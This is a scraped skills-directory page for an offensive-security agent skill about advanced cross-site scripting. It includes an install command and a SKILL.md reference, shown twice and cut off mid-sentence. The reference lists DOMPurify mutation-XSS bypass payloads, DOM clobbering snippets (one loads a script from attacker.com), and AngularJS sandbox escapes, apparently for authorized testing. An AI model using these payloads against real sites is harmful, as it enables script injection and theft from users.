Xss Cross Site Scripting

Name: Xss Cross Site Scripting
Author: yaklang

yaklang/hack-skills

Load advanced XSS reference patterns—mXSS, DOM clobbering, Trusted Types bypass, Service Worker persistence—when hardening or pentesting web apps beyond basic reflected XSS checks.

Overview

XSS Cross-Site Scripting is an agent skill for the Ship phase that supplies advanced XSS and mXSS techniques and sanitizer-bypass patterns for authorized application security testing.

Install

npx skills add https://github.com/yaklang/hack-skills --skill xss-cross-site-scripting

What is this skill?

mXSS mechanics: sanitizer vs browser re-parse via innerHTML mutation
DOMPurify bypass families: MathML/SVG namespace confusion, noscript parsing differential, form/table restructuring
Modern vectors: DOM Clobbering, Trusted Types bypass angles, Service Worker persistence (per supplementary reference sco
Explicit test loop: sanitizer output → innerHTML assignment → inspect live DOM
Supplementary SKILL load trigger for agents already running XSS assessments

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.2k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

What problem does it solve?

Your app uses a popular sanitizer but you do not know if browser re-parsing after innerHTML can still mutate markup into executable XSS.

Who is it for?

Solo builders shipping web apps with user HTML, WYSIWYG, or complex DOM frameworks who run authorized security reviews.

Skip if: Unauthorized targeting of third-party sites, or teams that only need high-level OWASP cheat sheets without exploit-level detail.

When should I use this skill?

When the agent needs modern framework XSS, mXSS, DOM Clobbering, Trusted Types bypass, or Service Worker persistence techniques beyond the core SKILL.md.

What do I get? / Deliverables

Your agent applies documented mXSS and framework-specific bypass patterns in a structured test loop so you can patch sanitization, CSP, or Trusted Types before launch.

Documented XSS/mXSS test cases aligned to app sinks
Sanitizer-vs-browser differential reproduction steps
Remediation notes for parsing, CSP, or Trusted Types gaps

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Offensive XSS knowledge belongs in Ship security work, where you verify sanitization and browser parsing behavior before production exposure. Security subphase covers application security testing and remediation guidance for injection-class flaws.

How it compares

Depth reference for agent-led pentest workflows, not a passive dependency scanner or WAF configuration skill.

Common Questions / FAQ

Who is xss-cross-site-scripting for?

Developers and security-minded solo builders who test their own SaaS, APIs with HTML surfaces, or extensions under explicit authorization.

When should I use xss-cross-site-scripting?

During ship security review when validating sanitizers, SPAs, or rich text—especially before launch when DOM mutation and DOMPurify differentials matter.

Is xss-cross-site-scripting safe to install?

The content describes offensive security techniques; only use on systems you own or have permission to test, and review the Security Audits panel on this Prism page before install.

SKILL.md

READMESKILL.md - Xss Cross Site Scripting

# Advanced XSS Tricks — Supplementary Reference

> **Load trigger**: When the agent needs modern framework XSS, mXSS, DOM Clobbering, Trusted Types bypass, or Service Worker persistence techniques beyond the core SKILL.md.

## 1. mXSS (Mutation XSS)

Browser HTML parser "fixes" markup differently than sanitizers expect, causing benign-looking HTML to mutate into executable payloads after DOM insertion.

### Core Mechanism
Sanitizer parses HTML → produces safe output → browser re-parses during `innerHTML` assignment → mutation creates executable node.

### DOMPurify Bypass Patterns

**Namespace confusion (SVG/MathML → HTML back-context):**
```html
<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img src=1 onerror=alert(1)&gt;">
```
Parser treats content as MathML, but browser switches to HTML integration point inside `<mtext>`, causing `<img>` to become executable.

**`<noscript>` parsing differential:**
```html
<noscript><style></noscript><img src=x onerror=alert(1)>
```
DOMPurify (scripting enabled) sees `<style>` consuming the rest. Browser with `scripting=false` context sees the `<img>` as a sibling.

**Form/table restructuring:**
```html
<form><math><mtext></form><form><mglyph><svg><mpath><set attributeName=onmouseover to=alert(1)>
```
Browser tree builder auto-closes first form and restructures, creating unexpected live elements.

### Key Principle
Test with: sanitizer output → `element.innerHTML = sanitized` → inspect actual DOM. If DOM differs from sanitizer's expected tree, mutation XSS is possible.

---

## 2. DOM Clobbering

Override JavaScript variables/properties by injecting HTML elements with specific `id` or `name` attributes.

### Basic Clobbering
```html
<!-- Clobber window.x -->
<img id=x>
<!-- Now window.x === the <img> element -->

<!-- Clobber nested: window.x.y -->
<form id=x><img id=y></form>
<!-- window.x.y === the <img> element -->

<!-- Clobber window.x.y via <a> href (toString = href) -->
<a id=x href="javascript:alert(1)">
<!-- String(window.x) === "javascript:alert(1)" -->
```

### HTMLCollection Clobbering (array-like)
```html
<a id=x>1</a><a id=x>2</a>
<!-- window.x is HTMLCollection [a, a] -->
<!-- window.x[0], window.x[1] accessible -->
```

### Deep Property Clobbering (3+ levels)
```html
<form id=x name=y><input id=z></form>
<!-- document.x.y.z exists -->
```

### Exploit Patterns
If code does `if (window.config) { url = window.config.url; }` and `config` is not defined:
```html
<a id=config href="https://attacker.com/evil.js">
```
Code now loads attacker-controlled URL.

### Defense Check
Code using `typeof x !== 'undefined'` or `x instanceof Object` can sometimes be bypassed because DOM elements are objects.

---

## 3. Modern Framework XSS

### React
- `dangerouslySetInnerHTML={{__html: userInput}}` — direct XSS if userInput is unsanitized
- `href={userInput}` on `<a>` — `javascript:` protocol not blocked by React
- SSR hydration mismatch — server renders different HTML than client expects, dangling markup possible
- `eval()` in `useEffect` with user data

### Vue.js
- `v-html="userInput"` — equivalent to innerHTML, no sanitization
- Server-side template injection via `{{ }}` in SSR mode
- `v-bind:href` / `:href` accepts `javascript:` URIs
- Component `is` attribute with user input → dynamic component injection

### Angular
- `bypassSecurityTrustHtml()` / `bypassSecurityTrustUrl()` — explicit trust marking
- Angular Universal SSR template injection
- `[innerHTML]` binding with bypassed sanitizer
- Older Angular.js (1.x) sandbox escapes still relevant for legacy apps:
```
{{constructor.constructor('alert(1)')()}}
{{'a]'.constructor.prototype.charAt=[].join;$eval('x=1}alert(1)//')}}
```

### Next.js / Nuxt
- `getServerSideProps` returning unsanitized data rendered with `dangerouslySetInnerHTML`
- API routes reflecting input without encoding
- `_document.js` custom head injection

---

## 4. Trusted Types Bypass

Trusted Types enforce that DOM XSS sinks only

What is this skill?

mXSS mechanics: sanitizer vs browser re-parse via innerHTML mutation

DOMPurify bypass families: MathML/SVG namespace confusion, noscript parsing differential, form/table restructuring

Modern vectors: DOM Clobbering, Trusted Types bypass angles, Service Worker persistence (per supplementary reference sco

Explicit test loop: sanitizer output → innerHTML assignment → inspect live DOM

Supplementary SKILL load trigger for agents already running XSS assessments

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.2k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

What do I get? / Deliverables

Your agent applies documented mXSS and framework-specific bypass patterns in a structured test loop so you can patch sanitization, CSP, or Trusted Types before launch.

Documented XSS/mXSS test cases aligned to app sinks

Sanitizer-vs-browser differential reproduction steps

Remediation notes for parsing, CSP, or Trusted Types gaps

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Xss Cross Site Scripting

# Advanced XSS Tricks — Supplementary Reference

> **Load trigger**: When the agent needs modern framework XSS, mXSS, DOM Clobbering, Trusted Types bypass, or Service Worker persistence techniques beyond the core SKILL.md.

## 1. mXSS (Mutation XSS)

Browser HTML parser "fixes" markup differently than sanitizers expect, causing benign-looking HTML to mutate into executable payloads after DOM insertion.

### Core Mechanism
Sanitizer parses HTML → produces safe output → browser re-parses during `innerHTML` assignment → mutation creates executable node.

### DOMPurify Bypass Patterns

**Namespace confusion (SVG/MathML → HTML back-context):**
```html
<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img src=1 onerror=alert(1)&gt;">
```
Parser treats content as MathML, but browser switches to HTML integration point inside `<mtext>`, causing `<img>` to become executable.

**`<noscript>` parsing differential:**
```html
<noscript><style></noscript><img src=x onerror=alert(1)>
```
DOMPurify (scripting enabled) sees `<style>` consuming the rest. Browser with `scripting=false` context sees the `<img>` as a sibling.

**Form/table restructuring:**
```html
<form><math><mtext></form><form><mglyph><svg><mpath><set attributeName=onmouseover to=alert(1)>
```
Browser tree builder auto-closes first form and restructures, creating unexpected live elements.

### Key Principle
Test with: sanitizer output → `element.innerHTML = sanitized` → inspect actual DOM. If DOM differs from sanitizer's expected tree, mutation XSS is possible.

---

## 2. DOM Clobbering

Override JavaScript variables/properties by injecting HTML elements with specific `id` or `name` attributes.

### Basic Clobbering
```html
<!-- Clobber window.x -->
<img id=x>
<!-- Now window.x === the <img> element -->

<!-- Clobber nested: window.x.y -->
<form id=x><img id=y></form>
<!-- window.x.y === the <img> element -->

<!-- Clobber window.x.y via <a> href (toString = href) -->
<a id=x href="javascript:alert(1)">
<!-- String(window.x) === "javascript:alert(1)" -->
```

### HTMLCollection Clobbering (array-like)
```html
<a id=x>1</a><a id=x>2</a>
<!-- window.x is HTMLCollection [a, a] -->
<!-- window.x[0], window.x[1] accessible -->
```

### Deep Property Clobbering (3+ levels)
```html
<form id=x name=y><input id=z></form>
<!-- document.x.y.z exists -->
```

### Exploit Patterns
If code does `if (window.config) { url = window.config.url; }` and `config` is not defined:
```html
<a id=config href="https://attacker.com/evil.js">
```
Code now loads attacker-controlled URL.

### Defense Check
Code using `typeof x !== 'undefined'` or `x instanceof Object` can sometimes be bypassed because DOM elements are objects.

---

## 3. Modern Framework XSS

### React
- `dangerouslySetInnerHTML={{__html: userInput}}` — direct XSS if userInput is unsanitized
- `href={userInput}` on `<a>` — `javascript:` protocol not blocked by React
- SSR hydration mismatch — server renders different HTML than client expects, dangling markup possible
- `eval()` in `useEffect` with user data

### Vue.js
- `v-html="userInput"` — equivalent to innerHTML, no sanitization
- Server-side template injection via `{{ }}` in SSR mode
- `v-bind:href` / `:href` accepts `javascript:` URIs
- Component `is` attribute with user input → dynamic component injection

### Angular
- `bypassSecurityTrustHtml()` / `bypassSecurityTrustUrl()` — explicit trust marking
- Angular Universal SSR template injection
- `[innerHTML]` binding with bypassed sanitizer
- Older Angular.js (1.x) sandbox escapes still relevant for legacy apps:
```
{{constructor.constructor('alert(1)')()}}
{{'a]'.constructor.prototype.charAt=[].join;$eval('x=1}alert(1)//')}}
```

### Next.js / Nuxt
- `getServerSideProps` returning unsanitized data rendered with `dangerouslySetInnerHTML`
- API routes reflecting input without encoding
- `_document.js` custom head injection

---

## 4. Trusted Types Bypass

Trusted Types enforce that DOM XSS sinks only

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is xss-cross-site-scripting for?

When should I use xss-cross-site-scripting?

Is xss-cross-site-scripting safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is xss-cross-site-scripting for?

When should I use xss-cross-site-scripting?

Is xss-cross-site-scripting safe to install?

SKILL.md